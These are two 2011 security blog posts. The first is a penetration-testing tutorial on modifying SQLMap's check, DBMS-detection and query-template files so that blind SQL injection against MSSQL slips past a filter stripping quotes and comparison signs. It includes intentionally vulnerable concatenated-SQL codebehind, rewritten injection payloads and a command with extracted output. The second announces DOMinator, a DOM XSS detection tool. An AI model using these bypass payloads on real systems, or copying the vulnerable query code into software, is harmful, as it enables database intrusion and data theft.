Saturday, May 28, 2011

Customizing SQLMap to bypass weak (but effective) input filters

SQLMap is the most flexible Sql injection tool I have ever seen: written in python, opensource and fully customizable. Many times during penetration testing activities you will face the need to customize SQLMap.

In the following example the tool is not able to extract any data in it's default configuration since the application is filtering some particular characters.

Let's consider the following URL, where "id" parameter is known to the tester to be vulnerable. Website Url vulnerable to SQL injection:
https://www.bank.ok/injection.aspx?id=1%2b1


Codebehind in "injection.aspx.vb":
-------
string id = Request.Get("id")
id =
id.Replace("'","").Replace('"',''),Replace('<','').Replace('>','').Replace('=','')
Sql.execute("SELECT * FROM articles where article_id =" + id)
-------
Problem:

Even if data validation is not neat, it limits for sure standard pentesting tools. As we can see from SQLMap logs, bisection algorithm cannot work if the ">" character is filtered. In addition initial checks will not be able to discover that "id" parameter is injectable.

For example the following request will fail:
./sqlmap.py -u "https://www.bank.ok/injection.aspx?id=5" -p "id" --dbs
--dbms=mssql --string="This article is about politics"

Output: Error!

Solution:

To customize SqlMap for our purposes we need to accomplish 3 steps:
1) Disable all internal checks that are performed to see if a parameter
is injectable;
2) Tune Database checks;
3) Rewrite blind queries without filtered chars (in this case "<", ">"
and "=" );


1) To disable initial checks if you already know that a parameter is injectable, locate the following file in SQLMap tree: sqlmap/lib/controller/checks.py

This addition makes SQLmap skipping the control for checking if the
parameter is injectable or not. Since we already know that the parameter is injectable, we make SQLmap skip this check.

Added the following line at line "98"
-> return "numeric"

After that is important to skip database check:
2) Locate file: sqlmap/plugins/dbms/mssqlserver.py

After checking if the parameter is injectable, SQL map checks if the database is correct
or not. For Example if we already know that the database is MSSQL because of the "convert()" check.

We can skip this check as well:

Modified the following line at line "233"
else:
setDbms("Microsoft SQL Server")
self.getBanner()
kb.os = "Windows"
return True

3) To rewrite the logic behind inference, locate the following file
File: sqlmap/xml/queries.xml
In the following scenario I have rewritten Queries for MSSQL Server.

In particular "=" character sobstituted with "like" operator and changed ">" comparison via "between ... and", since the application filters the following chatacter set: = (equal
sign), < (left angle bracket),> (right angle bracket), " (double quote) and ' (single quote).



<inference query="+ CASE WHEN (ASCII(SUBSTRING((%s), %d, 1))) BETWEEN

%d+1 AND 500

THEN 0 ELSE 1 END--"/>

...

<blind query="SELECT %s..syscolumns.name FROM %s..syscolumns, %s..sysobjects
WHERE %s..syscolumns.id LIKE %s..sysobjects.id AND %s..sysobjects.name
LIKE '%s'"
query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,
%s..sysobjects WHERE
%s..syscolumns.name LIKE '%s' AND %s..syscolumns.id LIKE
%s..sysobjects.id AND
%s..sysobjects.name LIKE '%s'" count="SELECT LTRIM(STR(COUNT(name)))
FROM %s..syscolumns
WHERE id LIKE (SELECT id FROM %s..sysobjects WHERE name LIKE '%s')"
condition="[DB]..syscolumns.name"/>


The following command will now work. It will skip parameter injection test and will perform blind queries without using the filtered characters:

Command:

./sqlmap.py -u "https://www.bank.ok/injection.aspx?id=5" -p "id" --dbs

--dbms=mssql --string="This article is about politics"


Databases:

[1 entry]
+----------+
| Politics |
+----------+

Wednesday, May 18, 2011

The DOMinator Project

Update : DOMinator goes Pro and is now available at the following here

Finally DOMinator is public!


What is DOMinator?
DOMinator is a Firefox based software for analysis and identification of DOM Based Cross Site Scripting issues (DOMXss).
It is the first runtime tool which can help security testers to identify DOMXss.

How it works?

It uses dynamic runtime tainting model on strings and can trace back taint propagation operations in order to understand if a DOMXss vulnerability is actually exploitable.

You can have an introduction about the implementation flow and some interface description here

What are the possibilities?

In the topics of DOMXss possibilities are quite infinite.
At the moment DOMinator can help in identifying reflected DOM Based Xss, but there is potential to extend it to stored DOMXss analysis.

Download

Start from the installation instructions then have a look at the video.
Use the issues page to post about problems crashes or whatever.
And finally subscribe to the DOMinator Mailing List to get live news.

Video
A video has been uploaded here to show how it works.
Here's the video:


Soon I'll post more tutorials about the community version.


Some stats about DOM Xss

We downloaded top Alexa 1 million sites and analyzed the first 100 in order to verify the presence of exploitable DOM Based Cross Site Scripting vulnerabilities.
Using DOMinator we found that 56 out of 100 (56% of sites) were vulnerable to reliable DOMXss attacks.
Some analysis example can be found here and here.
We'll release a white paper about this research, in the meantime you can try to reach our results using DOMinator.

Future work

DOMinator is still in beta stage but I see a lot of potential in this project.
For example I can think about:
  • Dominator library (Spidermonkey) used in web security scanners project
  • for automated batch testing.
  • Logging can be saved in a DB and lately analyzed.
  • Per page testing using Selenium/iMacros.
  • A version of DOMinator for xulrunner.
  • A lot more
It only depends on how many people will help me in improving it.

So, if you're interested in contributing in the code (or in funding the project) let me know, I'll add you to the project contributors.
We have some commercial ideas about developing a more usable interface with our knowledge base but we can assure you that the community version will always be open and free.

In the next few days I'll release a whitepaper about DOMinator describing the implementation choices and the technical details.

Stay tuned for more information about DOMinator..the best is yet to come.

Acknowledgements
DOMinator is a project sponsored by Minded Security, created and maintainted by me (Stefano Di Paola).
I al want to thank Arshan Dabirsiaghi (Aspect Security), Gareth Heyes and Luca Carettoni (Matasano) for their feedback on the pre-pre-beta version :)

Finally, feel free to follow DOMinator news on Twitter as well by subscribing to @WisecWisec and @DOMXss.